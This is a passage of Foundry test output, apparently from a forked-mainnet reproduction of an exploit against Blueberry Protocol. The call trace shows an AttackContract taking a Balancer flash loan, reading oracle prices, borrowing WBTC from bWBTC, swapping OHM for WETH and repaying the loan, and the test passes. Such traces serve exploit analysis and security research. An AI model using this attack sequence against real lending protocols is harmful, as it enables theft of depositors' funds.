    │   │   │   │   │   │   │   │   │   │   │   ├─ [1502] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12117 [1.211e4], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 12117 [1.211e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321813 [1.106e20], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321813 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   └─ ← [Return] 12774830590457521373 [1.277e19]
    │   │   │   │   │   ├─ [6807] bUSDC::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [5304] bUSDC::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [3419] 0xCa73Bb2d183c4B1b28a108EB36096DC62f0B7e8c::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 913262603416 [9.132e11], 100000000000000 [1e14]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d4a2b16c9800000000000000000000000000000000000000000000000000005af3107a4000
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 913262603416 [9.132e11], 100000000000000 [1e14]
    │   │   │   │   │   ├─ [9829] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bUSDC::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]
    │   │   │   │   │   │   ├─ [8187] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   ├─ [7739] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [6528] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [6080] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x8fFfFfd4AfB6115b954Bd326cbe7B4BA576818f6::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x789190466E21a8b78b8027866CBBDc151542A26C::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1564, 100001644 [1e8], 1708588847 [1.708e9], 1708588847 [1.708e9], 1564
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419104796 [3.689e19], 100001644 [1e8], 1708588847 [1.708e9], 1708588847 [1.708e9], 36893488147419104796 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0c5a763c03000
    │   │   │   │   │   │   └─ ← [Return] 1000016440000000000 [1e18]
    │   │   │   │   │   ├─ [14030] bWBTC::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [12527] bWBTC::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [10642] 0x387815ebA6097060cCAb0d1dff547Dd46cb34F78::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 10000000000000000 [1e16]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002386f26fc10000
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 10000000000000000 [1e16]
    │   │   │   │   │   ├─ [9921] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bWBTC: [0xE61ad5B0E40c856E6C193120Bd3fa28A432911B6]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bWBTC::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]
    │   │   │   │   │   │   ├─ [8279] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [staticcall]
    │   │   │   │   │   │   │   ├─ [7831] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [6620] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [6172] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3235] 0xF4030086522a5bEEa4988F8cA5B36dbC97BeE88c::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1502] 0xdBe1941BFbe4410D6865b9b7078e0b49af144D2d::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 11572 [1.157e4], 5134223706061 [5.134e12], 1708653335 [1.708e9], 1708653335 [1.708e9], 11572 [1.157e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321268 [1.106e20], 5134223706061 [5.134e12], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321268 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000adf44abe7cb62c19400
    │   │   │   │   │   │   └─ ← [Return] 51342237060610000000000 [5.134e22]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6f221d2121185da6df2415a3110b3e75d2bbce077f1d7bef9fda5cf4fb6b827e: 0 → 1
    │   │   │   │   │   │   @ 0x86581590abc6f15fce38bf279cf1cbd925284db42a8dc4adfd579fead3ff779e: 0 → 0x000000000000000000000000e61ad5b0e40c856e6c193120bd3fa28a432911b6
    │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 3 → 4
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [32803] WBTC::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 686690100 [6.866e8])
    │   │   │   │   │   ├─ emit Transfer(from: bWBTC: [0xE61ad5B0E40c856E6C193120Bd3fa28A432911B6], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 686690100 [6.866e8])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x168c751dcf3a658daeb9170a35c16d0f24d80dceea950c69afe2b3d1cb27c966: 0x0000000000000000000000000000000000000000000000000000000028ee0f34 → 0
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000000028ee0f34
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Borrow(borrower: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 686690100 [6.866e8], accountBorrows: 686690100 [6.866e8], totalBorrows: 686690100 [6.866e8])
    │   │   │   │   ├─ [408] BlueberryProtocol::borrowVerify(bWBTC: [0xE61ad5B0E40c856E6C193120Bd3fa28A432911B6], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 686690100 [6.866e8])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000065d70397 → 0x0000000000000000000000000000000000000000000000000000000065d80147
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x0000000000000000000000000000000000000000000000000000000028ee0f34
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000000028ee0f34
    │   │   │   │   │   @ 19: 0x0000000000000000000000000000000000000000000000000000000028ee0f34 → 0
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   │   @ 11: 0 → 0x0000000000000000000000000000000000000000000000000000000028ee0f34
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [106371] pool::exactOutputSingle(ExactOutputSingleParams({ tokenIn: 0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5, tokenOut: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, fee: 3000, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77], amountOut: 999999999999999999 [9.999e17], amountInMaximum: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77], sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [98717] 0x88051B0eea095007D3bEf21aB287Be961f3d8598::swap(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, -999999999999999999 [-9.999e17], 4295128740 [4.295e9], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000bb864aa3364f17a4d01c6f1751fd97c2bd3d7e7f1d5000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [8062] WETH::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 999999999999999999 [9.999e17])
    │   │   │   │   │   ├─ emit Transfer(from: 0x88051B0eea095007D3bEf21aB287Be961f3d8598, to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 999999999999999999 [9.999e17])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x58a37fd9ac1e447a7955f005fbd821272b5936632d99e799a2b7f11f09b0c85f: 0x0000000000000000000000000000000000000000000000271adef4a743bd5d12 → 0x0000000000000000000000000000000000000000000000270cfe3df39c595d13
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 9997 → 0x0000000000000000000000000000000000000000000000000de0b6b3a764270c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2468] OHM::balanceOf(0x88051B0eea095007D3bEf21aB287Be961f3d8598) [staticcall]
    │   │   │   │   │   └─ ← [Return] 176108385781724 [1.761e14]
    │   │   │   │   ├─ [17924] pool::uniswapV3SwapCallback(233250266788 [2.332e11], -999999999999999999 [-9.999e17], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000bb864aa3364f17a4d01c6f1751fd97c2bd3d7e7f1d5000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [8774] OHM::transferFrom(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x88051B0eea095007D3bEf21aB287Be961f3d8598, 233250266788 [2.332e11])
    │   │   │   │   │   │   ├─ emit Transfer(from: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x88051B0eea095007D3bEf21aB287Be961f3d8598, value: 233250266788 [2.332e11])
    │   │   │   │   │   │   ├─ emit Approval(owner: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: pool: [0xE592427A0AEce92De3Edee1F18E0157C05861564], value: 115792089237316195423570985008687907853269984665640564039457584007679879373147 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000000000007d615de03c2 → 0x0000000000000000000000000000000000000000000000000000079fc711651e
    │   │   │   │   │   │   │   @ 0x3654df304856564dc45cce134cd99fc8d2840bf25390d9edea6d987fe01af77f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffc9b133615b
    │   │   │   │   │   │   │   @ 0xed62b5c98614617d01d46dca15f9cb8d7df1a75150981bb46b5258ad5e0b3deb: 0x0000000000000000000000000000000000000000000000000000a02b6dc6c7dc → 0x0000000000000000000000000000000000000000000000000000a061bc936680
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0x000000000000000000000000000000000000000000000000000000364ecc9ea4
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [468] OHM::balanceOf(0x88051B0eea095007D3bEf21aB287Be961f3d8598) [staticcall]
    │   │   │   │   │   └─ ← [Return] 176341636048512 [1.763e14]
    │   │   │   │   ├─ emit Swap(param0: pool: [0xE592427A0AEce92De3Edee1F18E0157C05861564], param1: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 233250266788 [2.332e11], param3: -999999999999999999 [-9.999e17], param4: 164179693672794181000710155971695 [1.641e32], param5: 346376944298841717 [3.463e17], param6: 152735 [1.527e5])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x57bfdefd2f30ef0953bf9b17285174b4e4a372a4a7e19e4daaf78af5c91b3344: 0x00000000000000000000000000000000086e6c2d5bc3fbe7e00175aec3382b35 → 0x000000000000000000000000000000000000007c758ef3c27606b9b2f6185a99
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000615c0f70e00382b → 0x00000000000000000000000000000000000000000000000004ce93fee3515675
    │   │   │   │   │   @ 0x57bfdefd2f30ef0953bf9b17285174b4e4a372a4a7e19e4daaf78af5c91b3345: 0x000000000000000000000000000000587601c799e2e651d7a9d72c16344aadb3 → 0x0000000000000000000000000000000020296834f036d19841855a485771696a
    │   │   │   │   │   @ 0x57bfdefd2f30ef0953bf9b17285174b4e4a372a4a7e19e4daaf78af5c91b3346: 0x0165d68db3018b35e0025c71f828c2b17ef1098ad4f932384a0008d4caf607f5 → 0x01000173940000000000000000003d1099ff5db51bef58710c000003628d38a4
    │   │   │   │   │   @ 0: 0x000100003c003c00370254ba000000000000081b0e888a3e806bd0bbf2c4caea → 0x000100003c003c003802549f00000000000008183d3394be6764afb97618ac6f
    │   │   │   │   │   @ 64: 0x01018b35e0025c71f828681f0c1c424f5cc3312eb90008d0d41cc85165d4da53 → 0x01018b35e0025c71f828ffc218f0673ff0e88aa9560008d82d83409965d80147
    │   │   │   │   │   @ 1: 0x00000000000000000000000000000000086e6ca908f31a4a63e22c96a1a0182f → 0x00000000000000000000000000000000086e6cb180e8d4609e52e21e869bac1c
    │   │   │   │   └─ ← [Return] 233250266788 [2.332e11], -999999999999999999 [-9.999e17]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000000000000000364ecc9ea4 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] 233250266788 [2.332e11]
    │   │   ├─ [3262] WETH::transfer(balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 1000000000000000000 [1e18])
    │   │   │   ├─ emit Transfer(from: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 1000000000000000000 [1e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000bb3d8fa2d55a62eff8b → 0x000000000000000000000000000000000000000000000bb3e6dae4094d92ff8b
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000de0b6b3a764270c → 9996
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 0x86581590abc6f15fce38bf279cf1cbd925284db42a8dc4adfd579fead3ff779b: 0 → 0x000000000000000000000000643d448cea0d3616f0b32e3718f563b164e7edd2
    │   │   └─ ← [Stop]
    │   ├─ [534] WETH::balanceOf(balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 55264633359662360756107 [5.526e22]
    │   ├─ emit FlashLoan(param0: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], param2: 1000000000000000000 [1e18], param3: 0)
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 9997
    │   @ 0x3654df304856564dc45cce134cd99fc8d2840bf25390d9edea6d987fe01af77f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 51.43s (48.79s CPU time)

Ran 2 test suites in 52.61s (53.63s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
